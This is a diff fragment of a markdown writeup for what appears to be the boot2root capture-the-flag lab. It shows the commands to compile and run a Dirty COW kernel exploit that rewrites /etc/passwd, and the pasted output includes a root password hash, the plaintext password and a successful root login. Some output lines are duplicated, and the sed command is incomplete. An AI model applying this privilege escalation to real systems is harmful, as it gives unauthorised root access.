ClemaX/boot2root/writeup1.md

 We follow the instructions and run the following command from our target machine :

 ```
+sed -i 's/firefart/root/g'
 gcc -pthread dirty.c -o dirty -lcrypt
 ./dirty

+laurie@BornToSecHackMe:~$ ./dirty
+/etc/passwd successfully backed up to /tmp/passwd.bak
+Please enter the new password:
+Complete line:
+root:rop7p1ajG/5R.:0:0:pwned:/root:/bin/bash

+mmap: b7fda000
+madvise 0

+ptrace 0
+Done!
+Check /etc/passwd to see if the new user was created.
+You can log in with the username 'root' and the password 'coolcoolcool'.

+DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
+Done!
+Check /etc/passwd to see if the new user was created.
+You can log in with the username 'root' and the password 'coolcoolcool'.

+DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
+laurie@BornToSecHackMe:~$ su - root
+Password:
+root@BornToSecHackMe:~# whoami
+root
 ```